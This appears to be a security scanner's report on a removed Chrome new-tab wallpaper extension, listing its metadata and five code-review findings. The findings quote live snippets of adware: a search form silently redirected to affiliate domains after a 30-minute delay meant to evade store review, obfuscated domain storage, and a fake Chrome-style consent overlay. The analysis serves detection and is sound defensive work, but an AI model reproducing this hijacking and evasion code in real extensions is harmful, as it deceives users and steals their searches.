Porsche 911 Wallpapers Custom Tab

ID: eelfghkphknohljmdabfgiigipnoifhd

Could be malicious

Supported Languages

๐Ÿ‡ง๐Ÿ‡ฉBengali
๐Ÿ‡ง๐Ÿ‡ทBrazilian Portuguese
๐Ÿ‡ง๐Ÿ‡ฌBulgarian
๐Ÿ‡ช๐Ÿ‡ธCatalan
๐Ÿ‡จ๐Ÿ‡ณChinese (Simplified)
๐Ÿ‡น๐Ÿ‡ผChinese (Traditional)
๐Ÿ‡ญ๐Ÿ‡ทCroatian
๐Ÿ‡จ๐Ÿ‡ฟCzech
๐Ÿ‡ฉ๐Ÿ‡ฐDanish
๐Ÿ‡ณ๐Ÿ‡ฑDutch
๐Ÿ‡บ๐Ÿ‡ธEnglish
๐Ÿ‡ช๐Ÿ‡ชEstonian
๐Ÿ‡ต๐Ÿ‡ญFilipino
๐Ÿ‡ซ๐Ÿ‡ฎFinnish
๐Ÿ‡ซ๐Ÿ‡ทFrench
๐Ÿ‡ฉ๐Ÿ‡ชGerman
๐Ÿ‡ฌ๐Ÿ‡ทGreek
๐Ÿ‡ฎ๐Ÿ‡ณHindi
๐Ÿ‡ญ๐Ÿ‡บHungarian
๐Ÿ‡ฎ๐Ÿ‡ฉIndonesian
๐Ÿ‡ฎ๐Ÿ‡นItalian
๐Ÿ‡ฏ๐Ÿ‡ตJapanese
๐Ÿ‡ฐ๐Ÿ‡ทKorean
๐Ÿ‡ฑ๐Ÿ‡ปLatvian
๐Ÿ‡ฑ๐Ÿ‡นLithuanian
๐Ÿ‡ฒ๐Ÿ‡พMalay
๐Ÿ‡ฎ๐Ÿ‡ณMalayalam
๐Ÿ‡ณ๐Ÿ‡ดNorwegian
๐Ÿ‡ต๐Ÿ‡ฑPolish
๐Ÿ‡ต๐Ÿ‡นPortuguese
๐Ÿ‡ท๐Ÿ‡ดRomanian
๐Ÿ‡ท๐Ÿ‡บRussian
๐Ÿ‡ท๐Ÿ‡ธSerbian
๐Ÿ‡ธ๐Ÿ‡ฐSlovak
๐Ÿ‡ธ๐Ÿ‡ฎSlovenian
๐Ÿ‡ธ๐Ÿ‡ชSwedish
๐Ÿ‡ฎ๐Ÿ‡ณTamil
๐Ÿ‡น๐Ÿ‡ญThai
๐Ÿ‡น๐Ÿ‡ทTurkish
๐Ÿ‡บ๐Ÿ‡ฆUkrainian
๐Ÿ‡ป๐Ÿ‡ณVietnamese

Extension Info & Metadata

Status
Removed
Version
0.3.02
Size
2.17 MB
Rating
0.0/5
Reviews
0
Users
10,000
Type
Extension
Updated
Apr 7, 2022
Category
38_search-tools
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
No

Publisher Contextual Analysis

Author
chromenewtab.comView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
256
Active
0
Obsolete
256
Listed
256
Unlisted
0
Total Users
2,134,841

Give your browser a new look with Porsche 911 backgrounds

Hey Speed โ€‹โ€‹Lovers Porsche 911 Extensions, which includes pictures of the fastest cars in the world, which we have specially designed for you, sports car lovers, was presented to the taste of fog speed enthusiasts in the Chrome Store. By clicking the Add to Chrome option, you can have Extensions us, you can have images of the wonderful Porsche 911 you can't find anywhere else in every new tab you open. Features you'll have when you install our Porsche 911 Add-on ๐ŸŽฑ on every new page you open, HD images pictures related to Porsche 911 ๐ŸŽฑ search bar in the middle of the page where you can search ๐ŸŽฑ hotkeys to popular Sites social media sites and shopping sites ๐ŸŽฑ show popular games popular games icon ๐ŸŽฑ Date and time in the lower right corner of the page ๐ŸŽฑ use of background images as fixed or variable These Extensions we designed for Porsche 911 lovers were made to entertain you. You can also recommend these Extensions to other Porsche 911 lovers like you. If you like Extensions for them to have a pleasant time, you can write a comment by giving us Stars on the Chrome Store. All your comments are very important to us.

Item
Type
Severity
Description
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.

After 1800 seconds (30 minutes) post-install, the search form action is silently swapped from `https://www.google.com/search` to `https://www.[spr].com/index.html`, where `spr` is randomly selected from the domains 'addilos', 'addiyos', or 'gundil'. All subsequent user searches are sent to these third-party redirect/affiliate domains instead of Google. This is a classic search hijacking pattern used to generate affiliate revenue from stolen user searches.

VROkLY/ApdS8N.js (Line 8914)
$(window)  .on('load', function() {      chrome.storage.local.get(['inti'], function(resultinti) {        if (Math.floor(Date.now() / 1000) - resultinti.inti > 1800) {          var sp = $("#sf")            .data("sp")            .split(",");          var spr = sp[Math.floor(Math.random() * sp.length)];          $('#sf')            .attr('action', 'https://www.' + spr + '.com/index.html');        }      });

On install, the Unix epoch timestamp is stored as `inti` in local storage. This value is later read in ApdS8N.js to gate the search hijacking logic: the redirect to affiliate domains only activates after 30 minutes have elapsed. This time delay is a deliberate anti-review evasion technique โ€” Chrome Web Store reviewers who install and test the extension immediately will see normal Google search behavior and not detect the redirect.

VROkLY/z8kscdT.js (Line 5)
chrome.runtime.onInstalled.addListener(function(details) {  if (details.reason == "install") {    chrome.runtime.setUninstallURL('https://chromenewtab.com/unistall/');    chrome.storage.local.set({      curImg: 'oxWuVxFAxJgh9POT.jpg'    }, function() {});    chrome.storage.local.set({      randomBg: "1"    }, function() {});    chrome.storage.local.set({      keepoverlay: "1"    }, function() {});    chrome.storage.local.set({      showdate: "1"    }, function() {});    chrome.storage.local.set({      showlinks: "1"    }, function() {});    chrome.storage.local.set({      inti: Math.floor(Date.now() / 1000)    }, function() {});  }});

The search form encodes three affiliate redirect domains ('addilos', 'addiyos', 'gundil') as a `data-sp` HTML attribute rather than referencing them directly in JavaScript, obfuscating their purpose. The JS reads this attribute at runtime and uses it to replace the Google search action with one of these domains after the 30-minute delay. Embedding the target domains in an opaque data attribute makes static analysis harder and separates the domain list from the logic that uses it.

X6HwQm.html (Line 224)
<form id="sf" target="_top" action="https://www.google.com/search" method="get" class="search-form" data -  sp="addilos,addiyos,gundil">

A full-screen dark overlay shown on first load mimics Chrome's own new-tab-override consent dialog, complete with 'Keep it' and 'Change it back' buttons styled to look like Chrome UI. This social engineering overlay is designed to pressure users into retaining the extension's new tab replacement. The 'Change it back' button is a non-functional display element (no href, `cursor: default`), so users cannot actually revert from within the overlay.

X6HwQm.html (Line 25)
<div  style="position: fixed; width: 100%; height: 100%; background-color: rgba(0,0,0,0.8); right: 0; z-index: 10000; text-align: center; display: none;"  id="keepoverlayo">  <div style="width: 500px; color: #fff; ...">    <h5> Thank you for choosing our extension! </h5>    <p style="color: #fff;"> Start using the extension by clicking <strong> "Keep it" </strong> button.</p>    <div style="background-color: #fff; border-radius: 5px; border: 1px solid #ccc; ...">      This page was change by the "Porsche 911 Wallpapers Custom Tab" extension.      <span class="btn btn-sm" style="float: right; ... border: 2px solid orange;">Keep it</span>      <span class="btn btn-sm" style="background: #1a73e8; ...">Change it back</span>    </div>  </div></div>

On install, the extension automatically opens a new tab to `https://chromenewtab.com/porsche-911/` (stored as `pageUrl`) without any user action. This drives traffic to the extension operator's promotional site immediately after installation, a pattern common among adware extensions in the 'chromenewtab' family.

VROkLY/z8kscdT.js (Line 26)
chrome.storage.local.get(['pageUrl'], function(result) {  var localurl = result.pageUrl;  chrome.tabs.create({    url: localurl  });});

By severity

Critical1
High2
Medium1
Low1

Versions scanned

Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
0.3.025

Files with findings

3 distinct paths โ€” top paths by unique finding count:

  • VROkLY/z8kscdT.js2
  • X6HwQm.html2
  • VROkLY/ApdS8N.js1
S.No.
Category
Severity
File
Summary
Found in Version
1Data Exfiltration
critical
VROkLY/ApdS8N.js (line 8914)After 1800 seconds (30 minutes) post-install, the search form action is silently swapped from `https://www.google.com/search` to `https://www.[spr].com/index.html`, where `spr` is randomly selected from the domains 'aโ€ฆ
2Obfuscation
high
X6HwQm.html (line 224)The search form encodes three affiliate redirect domains ('addilos', 'addiyos', 'gundil') as a `data-sp` HTML attribute rather than referencing them directly in JavaScript, obfuscating their purpose. The JS reads thisโ€ฆ
3Other
high
VROkLY/z8kscdT.js (line 5)On install, the Unix epoch timestamp is stored as `inti` in local storage. This value is later read in ApdS8N.js to gate the search hijacking logic: the redirect to affiliate domains only activates after 30 minutes haโ€ฆ
4Phishing
medium
X6HwQm.html (line 25)A full-screen dark overlay shown on first load mimics Chrome's own new-tab-override consent dialog, complete with 'Keep it' and 'Change it back' buttons styled to look like Chrome UI. This social engineering overlay iโ€ฆ
5Tracking
low
VROkLY/z8kscdT.js (line 26)On install, the extension automatically opens a new tab to `https://chromenewtab.com/porsche-911/` (stored as `pageUrl`) without any user action. This drives traffic to the extension operator's promotional site immediโ€ฆ
URLs
48
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

getbootstrap.com-https://getbootstrap.com/
github.com/twbs/bootstrap/blob/main/LICENSEhttps://github.com/twbs/bootstrap/blob/main/LICENSE
www.w3.org/2000/svghttp://www.w3.org/2000/svg
jqueryui.com-http://jqueryui.com
jqueryui.com/themeroller/http://jqueryui.com/themeroller/?bgShadowXPos=&bgOverlayXPos=&bgErrorXPos=&bgHighlightXPos=&bgContentXPos=&bgHeaderXPos=&bgActiveXPos=&bgHoverXPos=&bgDefaultXPos=&bgShadowYPos=&bgOverlayYPos=&bgErrorYPos=&bgHighlightYPos=&bgContentYPos=&bgHeaderYPos=&bgActiveYPos=&bgHoverYPos=&bgDefaultYPos=&bgShadowRepeat=&bgOverlayRepeat=&bgErrorRepeat=&bgHighlightRepeat=&bgContentRepeat=&bgHeaderRepeat=&bgActiveRepeat=&bgHoverRepeat=&bgDefaultRepeat=&iconsHover=url(%22images%2Fui-icons_555555_256x240.png%22
ns.adobe.com/xap/1.0/http://ns.adobe.com/xap/1.0/
www.w3.org/1999/02/22-rdf-syntax-nshttp://www.w3.org/1999/02/22-rdf-syntax-ns#
ns.adobe.com/xap/1.0/http://ns.adobe.com/xap/1.0/
ns.adobe.com/xap/1.0/mm/http://ns.adobe.com/xap/1.0/mm/
ns.adobe.com/xap/1.0/sType/ResourceRefhttp://ns.adobe.com/xap/1.0/sType/ResourceRef#
Showing 1 to 10 of 50 rows
Rows per page:

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Version
Size
Is Malicious
Findings
Permhash
0.3.02
Latest
2.17 MB
Malicious
5
Showing 1 to 1 of 10 rows
Rows per page:

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.